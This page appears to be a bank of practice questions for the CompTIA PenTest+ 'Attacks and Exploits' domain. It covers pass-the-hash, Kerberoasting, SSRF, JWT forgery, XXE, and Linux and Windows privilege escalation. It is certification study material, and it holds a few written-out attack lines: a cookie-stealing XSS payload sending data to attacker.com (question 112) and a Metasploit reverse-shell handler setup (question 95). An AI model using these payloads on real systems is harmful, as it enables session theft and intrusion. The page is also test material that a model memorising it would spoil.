Practice PT0-002 Attacks and Exploits questions with full explanations on every answer.
1. A penetration tester is conducting an internal network assessment and wants to capture NTLMv2 hashes from Windows hosts without sending any authentication traffic. Which tool and attack technique should the tester use?
2. During a web application test, the tester discovers a parameter that reflects user input in the response without sanitization. Which type of vulnerability is most likely present?
3. A tester wants to exploit a Windows service running with SYSTEM privileges that has an unquoted service path containing spaces. Which technique should be used to escalate privileges?
4. A penetration tester is performing a password attack on a Windows domain and has captured NTLM hashes. Which tool can be used to perform a pass-the-hash attack to gain remote code execution on a target system?
5. During a web application test, the tester uses sqlmap and identifies a time-based blind SQL injection. Which technique is sqlmap using to extract data?
6. A penetration tester needs to escalate privileges on a Linux system and finds that the current user can run a specific command with sudo without a password. Which tool should the tester consult to find known exploitation techniques for that command?
7. A penetration tester is attempting to exploit a server-side request forgery (SSRF) vulnerability in a cloud-hosted web application to access the cloud metadata service. Which IP address should the tester target?
8. A tester has gained a low-privilege shell on a Windows machine and found that the user has the SeImpersonatePrivilege enabled. Which attack can be used to escalate privileges to SYSTEM?
9. A penetration tester wants to crack NTLM hashes obtained from a Windows domain. Which hashcat mode should the tester use?
10. During a penetration test, the tester discovers a JWT token that uses the 'alg:none' header. Which attack does this vulnerability enable?
11. A penetration tester has compromised a Linux host and wants to use it as a pivot point to access an internal network that is not directly reachable from the attacker's machine. Which tool can create a SOCKS proxy for routing traffic through the compromised host?
12. A tester is exploiting a vulnerable web application and wants to perform a UNION-based SQL injection to extract data. Which condition is necessary for a successful UNION attack?
13. A penetration tester is performing a Kerberoasting attack. Which TWO steps are required for a successful Kerberoasting attack?
14. A penetration tester is testing a web application and wants to exploit an XXE vulnerability to read sensitive files. Which TWO payloads could be used?
15. A penetration tester is performing lateral movement in a Windows domain after compromising a workstation. Which THREE techniques can be used to move to another machine?
16. During an internal penetration test, a tester wants to capture NTLMv2 hashes by poisoning LLMNR and NBT-NS traffic. Which tool should the tester use?
17. A penetration tester has successfully compromised a Windows machine and wants to perform lateral movement to another machine using captured NTLM hashes. Which tool would allow the tester to pass the hash and execute commands remotely?
18. During a penetration test, a tester identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). The tester attempts to access the AWS metadata endpoint to retrieve temporary credentials. Which IP address is commonly used for the cloud metadata endpoint?
19. A penetration tester is exploiting a SQL injection vulnerability in a login page. The tester wants to extract data from another table without returning data in the original query. Which SQL injection technique should the tester use?
20. A tester wants to crack NTLM hashes captured from a Windows domain. Which hashcat mode should be used for NTLM hashes?
21. During a Linux privilege escalation attempt, a tester finds a binary with the SUID bit set that is not on the GTFOBins list. The binary executes /bin/bash with the effective UID of root. What is the most likely way to exploit this?
22. A penetration tester is assessing a web application that uses JSON Web Tokens (JWT) for authentication. The tester discovers that the server does not validate the signature algorithm properly. Which attack should the tester attempt to forge a valid token?
23. Which Metasploit command is used to interact with an established session on a compromised host?
24. A tester is performing a Cross-Site Request Forgery (CSRF) attack on a web application that uses SameSite cookies. Which SameSite attribute value is most likely to prevent the attack?
25. During a Windows privilege escalation attempt, the tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool is commonly used to exploit this privilege to gain SYSTEM?
26. A penetration tester has gained access to a Linux server and wants to move laterally to a Windows server. The tester captured a hash of a domain user. Which tool can be used to authenticate to the Windows server using the hash?
27. A tester is performing a Kerberoasting attack. After requesting TGS tickets, which hashcat mode should be used to crack them?
28. A penetration tester is conducting an internal network assessment. The tester wants to perform a man-in-the-middle attack to capture credentials. Which TWO tools can be used for ARP spoofing?
29. During a post-exploitation phase, a tester needs to establish persistence on a Windows target. Which THREE methods are commonly used for persistence on Windows?
30. A penetration tester is exploiting a web application and discovers an XML External Entity (XXE) vulnerability. Which TWO attacks can be performed using XXE?
31. A penetration tester is conducting a network attack and wants to intercept traffic between two hosts on the same local network by spoofing ARP responses. Which tool is specifically designed for this purpose?
32. During a penetration test, you capture NTLM hashes by poisoning LLMNR requests. Which tool would you use to exploit this and obtain the hashes?
33. After compromising a Linux host, you want to escalate privileges by exploiting a cron job that runs a script with root privileges. The script references an executable using a relative path. Which attack technique is most appropriate?
34. In a web application test, you find a parameter that directly references internal object IDs (e.g., user_id=123) and changing the ID allows access to another user's data. This vulnerability is known as:
35. During an internal penetration test, you need to perform lateral movement to a Windows target. You have a plaintext password for a domain user account. Which tool would be most appropriate to authenticate to the target using WMI?
36. You have obtained an NTLM hash of a domain admin account and want to authenticate to a remote server without cracking the password. Which technique enables you to authenticate using the hash?
37. A penetration tester is exploiting a SQL injection vulnerability in a web application. They want to extract data from the database without displaying it on the page. Which SQL injection technique should they use?
38. During a web application test, you discover a parameter that reflects user input in the response without proper encoding. You craft a payload that executes JavaScript in the victim's browser. This vulnerability is best classified as:
39. You are attacking a web application and notice that it makes requests to internal services. You attempt to access the cloud metadata endpoint at http://169.254.169.254/. Which vulnerability are you most likely exploiting?
40. After gaining initial access to a Windows host, you want to escalate privileges by exploiting a service that runs as SYSTEM but has an unquoted service path. What is the attack vector?
41. Which Metasploit command is used to display information about the current meterpreter session, including the target OS and user?
42. A penetration tester needs to crack a large number of NTLM hashes. They have a wordlist and want to apply common password mutations. Which hashcat option enables the use of a rule file to mutate words?
43. During a penetration test of a web application, you want to test for Cross-Site Request Forgery (CSRF) vulnerabilities. Which TWO conditions are necessary for a CSRF attack to succeed?
44. You have gained a foothold on a Linux server and identified a SUID binary that can be exploited to read arbitrary files. Which THREE techniques could be used to escalate privileges or gather sensitive information?
45. A penetration tester wants to pivot from a compromised Linux host to attack internal network resources that are not directly accessible. Which THREE tools or techniques can be used for pivoting?
46. During a penetration test, a tester captures NTLM hashes by spoofing LLMNR responses on the internal network. Which tool is most commonly used for this purpose?
47. A penetration tester wants to perform a pass-the-hash attack on a Windows target. Which tools can be used for this purpose? (Choose the best answer.)
48. During a web application test, the tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester modifies the JWT header to set the algorithm to 'none' and removes the signature. The server accepts the token. What type of attack is this?
49. A penetration tester needs to escalate privileges on a Linux system and finds that the user can run a script with sudo that has a vulnerable argument. Which resource should the tester consult to find exploitation techniques for common sudo misconfigurations?
50. A penetration tester obtains a meterpreter session on a Windows target. Which command would the tester use to check the current user's privileges and potentially escalate privileges if SeImpersonatePrivilege is enabled?
51. During a penetration test, a tester wants to crack NTLM hashes captured from a Windows domain. Which hashcat mode should the tester use for NTLM hashes?
52. A penetration tester is performing a web application test and wants to exploit a SQL injection vulnerability to extract data from a database. The tester knows that the application returns results in the HTTP response. Which type of SQL injection is being used?
53. A penetration tester discovers a web application that fetches URLs from user input without proper validation. The tester targets the internal cloud metadata endpoint at 169.254.169.254 to retrieve instance credentials. Which type of attack is this?
54. A penetration tester wants to use Metasploit to exploit a remote service. After selecting an exploit module, which command is used to set the remote host IP address?
55. During a Windows privilege escalation attempt, a tester finds that the SeImpersonatePrivilege is enabled for the current user. Which tool can be used to escalate privileges to SYSTEM using this privilege?
56. A penetration tester is performing an ARP spoofing attack using Bettercap to intercept traffic between a client and the gateway. What is the primary goal of this attack?
57. A tester finds a Linux binary with the SUID bit set that is owned by root and can be executed by any user. The binary is known to have a vulnerability that allows arbitrary code execution. Which command does the tester use to find all SUID binaries on the system?
58. A penetration tester has compromised a Linux server and wants to establish persistence. Which TWO of the following methods are commonly used for persistence on Linux?
59. During a penetration test, a tester successfully exploits a web application and gains a foothold. The tester needs to pivot to an internal network segment that is not directly accessible. Which THREE tools can the tester use to create a SOCKS proxy or tunnel for pivoting?
60. A penetration tester is assessing an Active Directory environment and wants to perform Kerberoasting to obtain service account passwords. Which TWO conditions are required for a successful Kerberoasting attack?
61. A penetration tester is performing a network attack and wants to intercept traffic between two hosts on the same local network. Which technique should the tester use to redirect traffic through their machine?
62. During a penetration test, the tester captured an NTLM hash using Responder and wants to pass the hash to gain access to a remote Windows system. Which tool would be most appropriate to perform a pass-the-hash attack?
63. A penetration tester is performing a SQL injection test on a web application. The tester sends the payload ' OR '1'='1 and receives the same response as with a normal request. However, when sending ' OR '1'='2, the response differs. Which type of SQL injection is most likely present?
64. During a web application penetration test, the tester discovers a JWT token in the Authorization header. The token uses the 'none' algorithm. What attack should the tester attempt?
65. A tester has exploited a Linux system and gained a low-privilege shell. The tester runs 'sudo -l' and sees that the current user can run /usr/bin/find as root without a password. Which privilege escalation technique should the tester use?
66. A penetration tester is performing an NTLM relay attack against a Windows network. The tester uses ntlmrelayx to relay captured NTLM authentication attempts to a target server. What must be true for this attack to succeed?
67. After gaining a foothold on a Windows server, a tester wants to laterally move to another machine. The tester has obtained NTLM hashes and wants to execute commands remotely. Which tool is specifically designed for remote command execution using hashes via WMI?
68. During a penetration test, the tester discovers a Linux binary with the SUID bit set owned by root. The binary is a custom script that executes 'cp' to copy files. The tester can control the source file path via an environment variable. Which privilege escalation technique should the tester attempt?
69. A penetration tester wants to crack NTLM hashes captured during an internal test. Which hashcat mode should the tester use for NTLM hashes?
70. A tester is performing a web application test and discovers a parameter that seems to reflect input in the response. The tester attempts a reflected XSS payload but the application filters script tags. Which XSS variant should the tester try next?
71. During a penetration test, the tester gains a Meterpreter session on a Windows target and wants to escalate privileges to SYSTEM. The current user has the SeImpersonatePrivilege token. Which tool should the tester use to exploit this privilege?
72. A tester is performing a Kerberoasting attack. After requesting TGS tickets for accounts with SPNs, what is the next step to obtain plaintext credentials?
73. A penetration tester is performing a web application test and identifies an endpoint that is vulnerable to Server-Side Request Forgery (SSRF). Which of the following actions can the tester perform using this vulnerability? (Choose TWO.)
74. During a Windows privilege escalation attempt, a penetration tester discovers that the AlwaysInstallElevated installation policy is enabled. Which of the following actions can the tester take to exploit this misconfiguration? (Choose TWO.)
75. A penetration tester is conducting a web application test and discovers an XML External Entity (XXE) vulnerability. Which of the following attacks can the tester perform using XXE? (Choose THREE.)
76. During a penetration test, a tester captures NTLMv2 hashes by spoofing LLMNR and NBT-NS responses on the internal network. Which tool is most commonly used for this type of attack?
77. A penetration tester has gained a low-privilege shell on a Windows server and discovers the user has the SeImpersonatePrivilege. Which tool could the tester use to escalate privileges to SYSTEM?
78. During a web application test, the tester discovers a parameter that reflects user input in the response without proper encoding. The tester crafts a payload that executes JavaScript when another user views the page. Which type of XSS is this, and what is a primary risk?
79. A penetration tester needs to crack NTLM hashes obtained from a Windows domain. The hashes are in the format used by Windows. Which hashcat mode should the tester use?
80. While testing a Linux system, the tester finds a binary with the SUID bit set owned by root. The binary executes a command based on user input without verifying the path. Which privilege escalation technique does this exemplify?
81. A penetration tester wants to perform a pass-the-hash attack against a Windows system using a captured NTLM hash. Which tool can be used to authenticate and execute commands remotely?
82. A tester identifies a SQL injection vulnerability in a login form. The application responds with different error messages for valid and invalid queries. Which type of SQL injection is most likely present, and what tool could automate exploitation?
83. During an internal penetration test, the tester wants to relay captured NTLM authentication to a server to gain access. Which tool from the Impacket suite is specifically designed for NTLM relay attacks?
84. A penetration tester gains a shell on a Linux server and needs to pivot to an internal network. The tester's attack machine can reach the compromised server but not the internal network. Which tool can create a SOCKS proxy on the compromised server?
85. A tester wants to crack a password hash using a wordlist combined with rules to generate variations. Which hashcat attack mode should be used?
86. A web application uses JSON Web Tokens (JWT) for authentication. The tester intercepts a token and decodes it to find the header contains "alg":"none". What vulnerability does this indicate, and how can it be exploited?
87. After compromising a Windows workstation, the tester wants to extract password hashes from the local SAM database. Which Metasploit meterpreter command should be used?
88. A penetration tester is conducting a web application test and discovers a server-side request forgery (SSRF) vulnerability. The application accepts a URL parameter and fetches the resource. Which TWO of the following are common SSRF exploitation techniques?
89. During a Windows privilege escalation attempt, the tester finds that the AlwaysInstallElevated registry key is set to 1. Which TWO actions can the tester perform to escalate privileges?
90. A penetration tester has gained initial access to a Linux server and wants to establish persistence. Which THREE of the following methods are commonly used for persistence on Linux systems?
91. A penetration tester runs the following command: `hashcat -m 1000 -a 0 hashes.txt rockyou.txt`. What type of attack is being performed?
92. During a penetration test, a tester captures NTLM hashes using Responder. Which of the following techniques would allow the tester to authenticate to a remote server without cracking the password?
93. A penetration tester is performing a web application test and discovers that the application reflects user input in the response without proper sanitization. However, the tester notices that the input is handled client-side via JavaScript. Which type of XSS is this?
94. A tester is exploiting a Linux system and finds a binary with the SUID bit set owned by root. The binary executes other commands. Which technique would allow privilege escalation to root?
95. A tester runs the following Metasploit commands:
```
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.0.5
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run
```
What is the purpose of this configuration?
96. A tester wants to enumerate SMB shares and execute commands remotely on a Windows target using captured credentials. Which tool is most appropriate?
97. During a web application test, a tester discovers that the application uses JWTs for session management. The tester captures a JWT and notices the 'alg' header is set to 'none'. Which attack is the tester likely to perform?
98. A tester is performing a privilege escalation on a Windows system and finds that the user has SeImpersonatePrivilege enabled. Which tool could be used to escalate to SYSTEM?
99. A tester is attempting to crack WPA2 handshakes captured from a wireless network. Which hashcat mode should be used?
100. A tester is exploiting a SQL injection vulnerability in a login form. The application returns different responses for valid and invalid queries. However, the tester cannot see the database output. Which type of SQL injection is most likely?
101. During a penetration test, a tester gains initial access to a Linux server and wants to pivot to an internal network that is not directly accessible. Which of the following tools is specifically designed for creating SOCKS proxies for pivoting?
102. A tester is performing a web application test and finds an endpoint that accepts XML input. The tester sends a payload that includes an external entity referencing a local file. Which vulnerability is being tested?
103. A penetration tester is performing a full-scope engagement and needs to identify potential privilege escalation vectors on a Windows system. Which TWO of the following are valid Windows privilege escalation techniques?
104. During a web application penetration test, a tester wants to identify vulnerabilities that allow unauthorized access to internal resources. Which TWO of the following are commonly exploited to access internal services?
105. A penetration tester successfully compromises a web server and wants to establish persistence on the system. Which THREE of the following are effective persistence mechanisms on a Linux system?
106. During a penetration test, a tester runs the Responder tool on the internal network and captures an NTLMv2 hash. Which type of network attack is being performed?
107. A penetration tester wants to crack NTLM hashes obtained from a Windows system. Which Hashcat mode should be used?
108. During a web application test, a tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester intercepts a JWT and changes the algorithm header to 'none' with an empty signature. Which attack is being attempted?
109. A penetration tester gains a low-privilege shell on a Linux server. The command 'sudo -l' reveals that the user can run /usr/bin/less as root without a password. Which tool would the tester likely use to escalate privileges?
110. During a penetration test, a tester uses Metasploit to exploit a Windows service and gets a meterpreter session. The tester wants to dump hashes from the compromised system. Which meterpreter command should be used?
111. A penetration tester is testing a web application and discovers an endpoint that returns XML data. The tester attempts to read /etc/passwd by injecting an external entity. Which type of attack is this?
112. While performing a web application penetration test, a tester observes that the application reflects user input in the page without proper sanitization. To steal session cookies, the tester crafts a payload like <script>document.location='http://attacker.com/?cookie='+document.cookie</script>. Which XSS type is this?
113. A penetration tester wants to perform a pass-the-hash attack against a Windows system. Which tool can be used to authenticate using the NTLM hash instead of a password?
114. During a post-exploitation phase, a tester has a foothold on a Linux server and wants to pivot to an internal web server that is not directly accessible. The tester has SSH access to the compromised server. Which command would create a local port forward to access the internal web server on port 80?
115. A penetration tester is performing a Kerberoasting attack. After requesting TGS tickets from a domain controller, which tool would be used to crack the tickets offline?
116. During a Windows privilege escalation attempt, a tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool can be used to exploit this privilege to gain SYSTEM access?
117. A tester finds that a web application is vulnerable to Server-Side Request Forgery (SSRF). The tester wants to access the cloud metadata endpoint to obtain instance credentials. Which IP address is commonly used for the cloud metadata service?
118. A penetration tester has obtained a set of NTLM hashes from a Windows domain. The tester wants to perform lateral movement to other systems. Which TWO tools can be used for this purpose? (Select TWO.)
119. During a web application penetration test, a tester identifies a SQL injection vulnerability. Which TWO techniques could be used to extract data from the database? (Select TWO.)
120. A penetration tester has gained a foothold on a Linux server and wants to escalate privileges to root. Which THREE of the following are potential privilege escalation vectors? (Select THREE.)
121. During a penetration test, a tester captures NTLMv2 hashes using Responder. The tester then uses ntlmrelayx to relay the captured hashes to a target server. Which of the following best describes this attack technique?
122. A penetration tester is performing an internal assessment and wants to intercept network traffic to capture credentials. Which tool is specifically designed for ARP spoofing and can also perform SSL stripping?
123. A penetration tester has gained a low-privilege shell on a Windows server and discovered that the SeImpersonatePrivilege is enabled. Which of the following tools would be most appropriate to escalate privileges to SYSTEM-level access?
124. A tester is exploiting a web application and identifies a parameter that reflects user input in the response without sanitization. The tester wants to steal session cookies from other users. Which type of cross-site scripting (XSS) attack should the tester use?
125. A penetration tester is using Hashcat to crack NTLM hashes obtained from a Windows domain controller. Which hash mode should the tester specify for NTLM hashes?
126. During a web application test, a tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester attempts to modify the 'alg' header to 'none' and sends the token. The server accepts the forged token. Which vulnerability is being exploited?
127. A penetration tester is performing an internal test and wants to move laterally from a compromised workstation to a domain controller. The tester has obtained the NTLM hash of a domain admin. Which of the following tools would allow the tester to authenticate using the hash without cracking it?
128. A tester finds a Linux binary with the SUID bit set. The binary is owned by root and executes a shell command. The tester runs the binary and gets a root shell. Which command would the tester likely have used to discover this SUID binary?
129. A tester is performing an SQL injection attack on a login form. The tester inputs a single quote (') and receives a database error. The application returns different responses for true and false conditions. Which type of SQL injection is most likely occurring?
130. A tester is targeting a web application that makes server-side requests to internal resources based on user input. The tester attempts to access the AWS metadata endpoint at http://169.254.169.254/latest/meta-data/. The request returns sensitive cloud credentials. Which vulnerability is being exploited?
131. During a penetration test, a tester gains access to a Linux system and runs 'sudo -l', which reveals that the user can run /usr/bin/python with root privileges without a password. Which resource should the tester consult to find a method to escalate privileges using this configuration?
132. A tester wants to perform a Kerberoasting attack against an Active Directory domain. The tester has a domain account with no special privileges. Which of the following is required to successfully request TGS tickets for offline cracking?
133. A penetration tester has obtained a meterpreter session on a Windows target. The tester wants to escalate privileges to SYSTEM and then dump password hashes. Which two meterpreter commands should the tester use in sequence? (Choose TWO.)
134. A tester is performing a post-exploitation phase on a compromised Linux server and wants to establish persistence. Which THREE of the following methods are commonly used for Linux persistence? (Choose THREE.)
135. A penetration tester is exploiting a web application and discovers an endpoint that allows an attacker to read arbitrary files on the server by manipulating XML input. The application uses an XML parser that does not disable external entities. Which TWO attacks can the tester perform using this vulnerability? (Choose TWO.)
136. During a penetration test, you run the following command on a Linux target: `find / -type f -perm /4000 2>/dev/null`. What are you attempting to identify?
137. You have captured an NTLMv2 hash from an LLMNR poisoning attack using Responder. Which tool and mode would you use to attempt to crack the hash using a dictionary attack?
138. During a web application test, you discover an endpoint that accepts a URL parameter and fetches the content. You try `http://169.254.169.254/latest/meta-data/` and receive a response. Which vulnerability is this?
139. In a Windows domain, you have compromised a user account with SeImpersonatePrivilege enabled. Which tool or technique would best leverage this privilege to escalate to SYSTEM?
140. Which SQL injection technique involves injecting a query that causes a delay in response, allowing the attacker to infer information based on response time?
141. After exploiting a Linux server, you need to pivot to a restricted network subnet. You have SSH access to the compromised server. Which command would create a SOCKS proxy on the server to route traffic through it?
142. You are testing a web application and notice that it uses JSON Web Tokens (JWT) for authentication. You change the algorithm to 'none' and remove the signature, and the token is accepted. Which JWT vulnerability did you exploit?
143. During a penetration test, you successfully execute a Meterpreter session on a Windows target. You want to dump password hashes from the SAM database. Which Meterpreter command should you use?
144. In Metasploit, after searching for an exploit, you select it with 'use exploit/...' and set required options. What is the final command to execute the exploit against the target?
145. You are performing a password attack on a Linux system. You have obtained the /etc/shadow file. Which password cracking tool would be most efficient for a rule-based attack using a wordlist?
146. During a web application test, you find a feature that allows users to export data as PDF. The PDF generation uses user input without sanitization. You inject an XML external entity that reads /etc/passwd and the content appears in the PDF. Which vulnerability is present?
147. You are performing a penetration test and capture a Kerberos TGS ticket for a service account. What kind of attack can you perform offline to crack the service account password?
148. You are enumerating a Linux system for privilege escalation vectors. Which TWO conditions below could be exploited to escalate privileges? (Select TWO.)
149. During a web application penetration test, you find that the application is vulnerable to CSRF. Which TWO factors could prevent exploitation even if a CSRF vulnerability exists? (Select TWO.)
150. You have compromised a low-privileged Windows user and want to move laterally to a domain controller. Which THREE techniques could be used for lateral movement if you have valid credentials? (Select THREE.)
151. During a penetration test, a tester captures NTLMv2 hashes by spoofing LLMNR responses. Which tool is most commonly used for this purpose?
152. A penetration tester wants to perform a pass-the-hash attack against a Windows target. Which tools can be used to authenticate using an NTLM hash without knowing the plaintext password? (Choose the best option.)
153. During a web application test, a tester discovers a parameter that appears to be vulnerable to SQL injection. They want to extract data from a database using a technique that does not rely on visible output. Which type of SQL injection is most appropriate?
154. A penetration tester identifies a Linux binary with the SUID bit set. Which command can find all SUID binaries on a Linux system?
155. While exploiting a Windows machine, a tester gains a shell with limited privileges. They attempt to escalate privileges using a tool that exploits the SeImpersonatePrivilege. Which tool is specifically designed for this purpose on modern Windows versions?
156. A tester is performing a JWT attack and modifies the header to set the algorithm to 'none'. Which vulnerability are they exploiting?
157. After gaining initial access to a target, a tester wants to pivot to an internal network that is not directly accessible. Which technique can be used to forward traffic from the tester's machine through the compromised host to reach internal services?
158. A penetration tester needs to perform Kerberoasting against an Active Directory domain. Which step is required after requesting TGS tickets?
159. During a web application test, a tester discovers an endpoint that fetches a URL from user input without validation. They attempt to access the AWS metadata endpoint. Which IP address is commonly used for the cloud metadata service?
160. A tester exploits an XXE vulnerability to read local files. Which of the following is a typical XXE payload to read /etc/passwd?
161. After compromising a host, a tester wants to maintain persistence on a Windows system by executing a payload each time a user logs in. Which registry key is commonly used for this?
162. A tester is using Hashcat to crack NTLM hashes. They want to try all possible passwords consisting of exactly 8 lowercase letters. Which attack mode and mask should they use?
163. A penetration tester is performing a web application assessment. Which of the following are common techniques to identify and exploit IDOR vulnerabilities? (Select TWO.)
164During a Linux privilege escalation attempt, a tester checks for misconfigurations that could allow running commands as root. Which of the following are potential vectors? (Select THREE.)
165A penetration tester has gained a foothold in a Windows domain and wants to perform lateral movement. Which of the following tools or techniques can be used? (Select THREE.)
166During a penetration test, a tester uses Responder to capture NTLM hashes from a Windows network. Which of the following protocols is MOST commonly targeted by Responder for poisoning?
167A penetration tester gains a low-privilege shell on a Linux server. Using 'sudo -l', the tester finds that they can run '/usr/bin/vi' as root without a password. Which technique would the tester MOST likely use to escalate privileges?
168During a web application test, a tester discovers a JWT token with the following header: {'alg':'HS256','typ':'JWT'}. The token payload contains 'admin':false. The tester attempts to change the algorithm to 'none' and removes the signature. Which vulnerability is being exploited?
169A penetration tester uses Hashcat to crack NTLM hashes captured during a pass-the-hash attack. Which Hashcat mode should the tester use for NTLM hashes?
170A penetration tester has compromised a Windows machine and wants to perform lateral movement to another machine on the same network. The tester has obtained NTLM hashes, but not plaintext passwords. Which TWO tools can be used for pass-the-hash attacks?
171During a Linux privilege escalation assessment, the tester finds that a binary with SUID root can execute arbitrary commands. Which TWO of the following methods are MOST likely to exploit this?
172A penetration tester is conducting a web application test and finds a parameter that is vulnerable to XXE. Which THREE of the following actions can the tester perform using XXE?
173A penetration tester is using Metasploit to exploit a remote Windows service. After a successful exploit, the tester gets a meterpreter session. Which TWO commands can the tester use to gather system information and credentials?
174A penetration tester is performing post-exploitation on a compromised Linux server and wants to maintain persistence. Which TWO of the following methods are commonly used for Linux persistence?
175During a penetration test, the tester discovers a web application vulnerable to CSRF. The application uses SameSite cookies set to 'Lax'. Which THREE methods might the tester use to exploit the CSRF vulnerability?
176A penetration tester is using Hashcat to crack password hashes. Which TWO attack modes are commonly used?
177During a Windows privilege escalation attempt, the tester finds that the current user has SeImpersonatePrivilege enabled. Which THREE tools or techniques can be used to exploit this privilege?
178A penetration tester is performing a web application test and identifies a potential SQL injection vulnerability. Which TWO methods can the tester use to confirm the vulnerability and extract data?
179During a penetration test, the tester gains access to a domain-joined Windows machine and wants to perform Kerberoasting. Which THREE conditions are necessary for a successful Kerberoasting attack?
180A penetration tester is using Metasploit to pivot from a compromised host to an internal network. Which THREE Metasploit features can facilitate pivoting?
181A penetration tester has gained initial access to an internal Windows server and wants to escalate privileges to SYSTEM. The tester identified that the current user has the SeImpersonatePrivilege enabled. Which TWO of the following tools or techniques would be most appropriate to exploit this privilege for privilege escalation?
The Attacks and Exploits domain covers the key concepts tested in this area of the PT0-002 exam blueprint published by CompTIA. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all PT0-002 domains — no account required.
The Courseiva PT0-002 question bank contains 181 questions in the Attacks and Exploits domain. Click any question to see the full explanation and answer breakdown.
Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.
Yes — the session launcher on this page draws questions exclusively from the Attacks and Exploits domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.